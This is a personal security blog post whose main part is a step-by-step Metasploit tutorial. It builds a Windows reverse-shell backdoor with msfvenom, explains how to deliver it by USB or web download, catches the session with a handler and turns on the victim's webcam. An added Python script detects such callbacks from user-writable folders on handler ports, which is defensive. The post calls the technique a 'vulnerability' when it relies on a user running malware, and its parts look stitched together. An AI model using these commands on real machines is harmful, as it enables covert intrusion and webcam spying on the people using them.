I am Nikhil Rathor (call me honey), a security researcher and reverse engineer. My parents say that I have been 'reversing since childhood' because I have been so connected to technology from an early age. My father taught me programming when I was very young and it has been my passion ever since. I was lucky: I got a good education from Indian government colleges, and if you know anything about India then you know it is hard for a student to get into a government college.

How I Got Into Reversing

Ever since I was a kid I wanted to break things to see how they worked, and for as long as I can remember I have wanted to learn about hacking and security. That is the first and the last reason I consider myself to be a competent security researcher.

In my early days I got involved with black hat things and it is my greatest regret.

Since then people have told me that being a white hat is a far better option for me, so I am now focused on white hat activities like reversing malware and exploits and solving the various "crackme" puzzles out there. Later in the year I plan to tackle the bug bounties I see on HackerOne and Bugcrowd. Whichever way I look at it, hacking for bounties is far better than doing the sh#tty black hat things.

Here are my GitHub projects and also my reverse-engineered code of WhatsApp. I have been happy the last few months and everyone seems to appreciate my work.

My Favorite Vulnerability

For the next part of this article I want to focus on my favorite vulnerability that can be used for exploiting Windows; it has been out in the wild for a while now. Specifically, we will get into my lab Windows environment and turn on the webcam livestream from a Meterpreter session open on my Linux device.

Getting your tools ready

1) First you need the Metasploit Framework by Rapid7; find it and install it.

Then run the following command to fire up Metasploit:

$ msfconsole

2) Next you need to install PostgreSQL; for that simply run this command:

$ sudo apt-get install postgresql

Then run the following command to start the PostgreSQL service:

$ sudo service postgresql start

Now I assume that you have installed both of the above tools, so let's explore how you can get into Windows.

3) Creating The Payload

Use msfvenom to create the PE (Portable Executable) Windows backdoor:

$ msfvenom -p windows/meterpreter/reverse_tcp lhost=<ip address of your linux machine> lport=4444 -f exe -o /root/Desktop/0xh0n3y.exe

Note: to obtain your IP address, type the following command (or ip addr on systems that no longer ship ifconfig):

$ ifconfig

Before you go further you have to transfer the executable to the Windows machine and run it there after you have executed the command "exploit" in the handler.

Note: the easiest way to transfer the executable to Windows is a USB/pen drive, or to host it on a website so that it can be downloaded through the web browser onto Windows.

Exploiting Windows Using Metasploit:

After installing Metasploit just execute the command:

$ msfconsole

Then execute the following commands:

msf5 > use exploit/multi/handler

msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp

msf5 exploit(multi/handler) > set lhost <ip address of your linux machine>

msf5 exploit(multi/handler) > set lport 4444

msf5 exploit(multi/handler) > show options

msf5 exploit(multi/handler) > exploit

Once the Meterpreter session starts:

meterpreter > help

Now you have full control of the Windows device; the help command lists the Meterpreter commands you can issue from the Linux machine against it.

And if you want to turn on the webcam of the Windows machine from your Linux machine, here is the command for that:

meterpreter > webcam_stream
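Seen from the defender's side, what this walkthrough produces on the Windows host is a user-launched executable sitting in a user-writable directory (the Desktop here) that opens an outbound TCP connection to the handler port (4444 here). The following Python script is an added example and is not part of the original post or of Metasploit: it runs a small detector over constructed connection records that imitate the fields of a Windows network-connection event (process image, destination, direction). The record format, paths and addresses are all assumed for the example, and only port 4444 comes from the post; the other handler ports and the allow-list of service ports are assumptions to tune for your own environment.

```python
"""Flag outbound connections that look like a reverse-shell callback.

Added example for this post, not part of it or of Metasploit. The records
below are constructed for the example and only imitate the fields of a
Windows network-connection event (process image, destination, direction);
they are not real Sysmon or firewall output.
"""
import re
from dataclasses import dataclass

# Directories an ordinary user can write to. The post drops its .exe on the
# Desktop; a program calling home from one of these is worth a second look,
# whereas Program Files or System32 binaries are expected to use the network.
USER_WRITABLE = ("\\desktop\\", "\\downloads\\", "\\temp\\", "\\appdata\\")

# 4444 is the handler port used in the post; the other values are assumed
# for the example as ports commonly chosen for reverse-shell handlers.
HANDLER_PORTS = {4444, 4445, 5555, 1337}

# Destination ports an unknown user-space program may legitimately use (assumed).
COMMON_SERVICE_PORTS = {53, 80, 443, 445, 88, 135, 389, 636}

# One constructed record per line: <timestamp> image=<path> dst=<ip>:<port> dir=<in|out>
LINE_RE = re.compile(
    r"^(?P<ts>\S+) image=(?P<image>.+?) dst=(?P<dst>[\d.]+):(?P<port>\d+) dir=(?P<dir>in|out)$"
)

SAMPLE_LOG = """\
2024-05-01T10:00:01Z image=C:\\Program Files\\Mozilla Firefox\\firefox.exe dst=93.184.216.34:443 dir=out
2024-05-01T10:00:05Z image=C:\\Windows\\System32\\svchost.exe dst=10.0.0.5:53 dir=out
2024-05-01T10:00:09Z image=C:\\Users\\lab\\Desktop\\0xh0n3y.exe dst=192.168.56.101:4444 dir=out
2024-05-01T10:00:12Z image=C:\\Users\\lab\\Downloads\\setup.exe dst=151.101.1.69:443 dir=out
2024-05-01T10:00:15Z image=C:\\Windows\\System32\\svchost.exe dst=10.0.0.9:49152 dir=in
"""


@dataclass(frozen=True)
class Finding:
    ts: str
    image: str
    dst: str
    port: int
    reasons: tuple


def parse_event(line):
    """Parse one record into a dict, or return None if the line is malformed."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    return {
        "ts": m["ts"],
        "image": m["image"],
        "dst": m["dst"],
        "port": int(m["port"]),
        "dir": m["dir"],
    }


def assess(ev):
    """Return the reasons an outbound event looks like a callback; empty means benign."""
    if ev["dir"] != "out":
        return []  # the callback is always initiated by the compromised host
    reasons = []
    image = ev["image"].lower()
    if any(d in image for d in USER_WRITABLE):
        reasons.append("process image runs from a user-writable directory")
    if ev["port"] in HANDLER_PORTS:
        reasons.append(f"destination port {ev['port']} is a common reverse-shell handler port")
    elif ev["port"] not in COMMON_SERVICE_PORTS:
        reasons.append(f"destination port {ev['port']} is not a common service port")
    # Either signal alone is noisy (an installer in Downloads fetching an update
    # over 443 is normal), so a finding needs both the path and the port signal.
    return reasons if len(reasons) == 2 else []


def scan(log_text):
    """Run the detector over a block of records and return the findings."""
    findings = []
    for line in log_text.splitlines():
        ev = parse_event(line)
        if ev is None:
            continue
        reasons = assess(ev)
        if reasons:
            findings.append(Finding(ev["ts"], ev["image"], ev["dst"], ev["port"], tuple(reasons)))
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f.ts} {f.image} -> {f.dst}:{f.port}")
        for r in f.reasons:
            print(f"    - {r}")
```

Run against the constructed records, only the Desktop executable calling 192.168.56.101:4444 is reported; the browser and the installer on port 443 and the inbound svchost connection pass. Requiring both signals keeps the rule quiet on workstations where users routinely run installers from Downloads, at the cost of missing a callback that goes out over 443, which is why a real deployment would pair this with process-creation and parent-process context.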

Happy Hacking!!!

You can check out my Medium blog here; I was also mentioned on The Hacker News.

Thanks for reading and giving your precious time. I hope you find this blog interesting; please share your views with me. It's just another infosec blog from me, and if you like it you can follow me on Twitter and Medium.

The awesome image used in this article is called Top Hat and was created by John Antes.